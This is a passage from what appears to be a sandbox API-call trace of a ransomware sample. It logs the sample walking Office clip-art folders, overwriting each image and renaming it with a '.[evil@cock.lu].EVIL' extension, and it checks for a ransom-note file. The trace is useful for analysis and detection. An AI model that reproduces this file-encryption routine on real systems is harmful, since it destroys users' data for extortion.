returned 1 [0166.860] wcsstr (_Str="PH01562U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.860] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP") returned 69 [0166.860] wcscmp (_String1="PH01562U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.860] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01562U.BMP") returned 0x0 [0166.860] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP") returned 0x45 [0166.860] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01562u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.862] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0166.864] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.864] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.864] _errno () returned 0x84b1160840 [0166.865] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.865] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0166.865] CloseHandle (hObject=0x1a8) returned 1 [0166.865] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.865] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.865] __uncaught_exception () returned 0x84b1160800 [0166.865] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.865] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01562u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01562u.bmp.[evil@cock.lu].evil")) returned 1 [0166.866] ??_V@YAXPEAX@Z () returned 0x1 [0166.869] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP", dwFileAttributes=0x200) returned 0 [0166.869] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.869] wcsstr (_Str="PH01607U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.869] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP") returned 69 [0166.869] wcscmp (_String1="PH01607U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.869] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01607U.BMP") returned 0x0 [0166.869] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP") returned 0x45 [0166.869] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01607u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.871] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0166.874] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.874] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.874] _errno () returned 0x84b1160840 [0166.874] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.874] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0166.874] CloseHandle (hObject=0x1a8) returned 1 [0166.874] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.874] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.874] __uncaught_exception () returned 0x84b1160800 [0166.874] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.875] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01607u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01607u.bmp.[evil@cock.lu].evil")) returned 1 [0166.875] ??_V@YAXPEAX@Z () returned 0x1 [0166.878] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP", dwFileAttributes=0x200) returned 0 [0166.878] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.878] wcsstr (_Str="PH01931J.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.878] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG") returned 69 [0166.878] wcscmp (_String1="PH01931J.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.878] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01931J.JPG") returned 0x0 [0166.878] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG") returned 0x45 [0166.878] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01931j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.881] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9abe, lpOverlapped=0x0) returned 1 [0166.883] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.883] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.883] _errno () returned 0x84b1160840 [0166.883] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.883] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x9ac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9ac0, lpOverlapped=0x0) returned 1 [0166.884] CloseHandle (hObject=0x1a8) returned 1 [0166.884] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.884] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.884] __uncaught_exception () returned 0x84b1160800 [0166.884] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.884] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01931j.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01931j.jpg.[evil@cock.lu].evil")) returned 1 [0166.886] ??_V@YAXPEAX@Z () returned 0x1 [0166.888] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG", dwFileAttributes=0x200) returned 0 [0166.889] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.889] wcsstr (_Str="PH02028K.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.889] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG") returned 69 [0166.889] wcscmp (_String1="PH02028K.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.889] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02028K.JPG") returned 0x0 [0166.889] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG") returned 0x45 [0166.889] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02028k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.891] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x451e, lpOverlapped=0x0) returned 1 [0166.894] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.894] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.894] _errno () returned 0x84b1160840 [0166.894] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.894] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x4520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4520, lpOverlapped=0x0) returned 1 [0166.894] CloseHandle (hObject=0x1a8) returned 1 [0166.894] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.894] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.894] __uncaught_exception () returned 0x84b1160800 [0166.894] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.895] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02028k.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02028k.jpg.[evil@cock.lu].evil")) returned 1 [0166.896] ??_V@YAXPEAX@Z () returned 0x1 [0166.898] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG", dwFileAttributes=0x200) returned 0 [0166.898] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.898] wcsstr (_Str="PH02039U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.898] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP") returned 69 [0166.898] wcscmp (_String1="PH02039U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.898] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02039U.BMP") returned 0x0 [0166.898] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP") returned 0x45 [0166.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02039u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.900] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0166.903] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.903] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.903] _errno () returned 0x84b1160840 [0166.903] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.903] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0166.904] CloseHandle (hObject=0x1a8) returned 1 [0166.904] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.904] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.904] __uncaught_exception () returned 0x84b1160800 [0166.904] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.904] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02039u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02039u.bmp.[evil@cock.lu].evil")) returned 1 [0166.906] ??_V@YAXPEAX@Z () returned 0x1 [0166.908] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP", dwFileAttributes=0x200) returned 0 [0166.909] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.909] wcsstr (_Str="PH02040U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.909] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP") returned 69 [0166.909] wcscmp (_String1="PH02040U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.909] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02040U.BMP") returned 0x0 [0166.909] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP") returned 0x45 [0166.909] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02040u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.911] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0166.914] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.914] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.914] _errno () returned 0x84b1160840 [0166.914] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.914] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0166.914] CloseHandle (hObject=0x1a8) returned 1 [0166.914] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.914] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.914] __uncaught_exception () returned 0x84b1160800 [0166.914] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.915] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02040u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02040u.bmp.[evil@cock.lu].evil")) returned 1 [0166.915] ??_V@YAXPEAX@Z () returned 0x1 [0166.918] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP", dwFileAttributes=0x200) returned 0 [0166.918] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.918] wcsstr (_Str="PH02053J.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.918] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG") returned 69 [0166.918] wcscmp (_String1="PH02053J.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.918] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02053J.JPG") returned 0x0 [0166.918] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG") returned 0x45 [0166.918] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02053j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.920] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6afc, lpOverlapped=0x0) returned 1 [0166.923] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.923] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.923] _errno () returned 0x84b1160840 [0166.923] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.923] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x6b00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6b00, lpOverlapped=0x0) returned 1 [0166.923] CloseHandle (hObject=0x1a8) returned 1 [0166.924] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.924] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.924] __uncaught_exception () returned 0x84b1160800 [0166.924] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.924] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02053j.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02053j.jpg.[evil@cock.lu].evil")) returned 1 [0166.926] ??_V@YAXPEAX@Z () returned 0x1 [0166.929] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG", dwFileAttributes=0x200) returned 0 [0166.929] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.929] wcsstr (_Str="PH02058U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.929] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP") returned 69 [0166.929] wcscmp (_String1="PH02058U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.929] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02058U.BMP") returned 0x0 [0166.929] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP") returned 0x45 [0166.929] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02058u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.931] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0166.934] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.934] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.934] _errno () returned 0x84b1160840 [0166.934] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.934] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0166.934] CloseHandle (hObject=0x1a8) returned 1 [0166.934] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.934] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.934] __uncaught_exception () returned 0x84b1160800 [0166.935] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.935] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02058u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02058u.bmp.[evil@cock.lu].evil")) returned 1 [0166.936] ??_V@YAXPEAX@Z () returned 0x1 [0166.938] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP", dwFileAttributes=0x200) returned 0 [0166.939] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.939] wcsstr (_Str="PH02062U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.939] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP") returned 69 [0166.939] wcscmp (_String1="PH02062U.BMP", 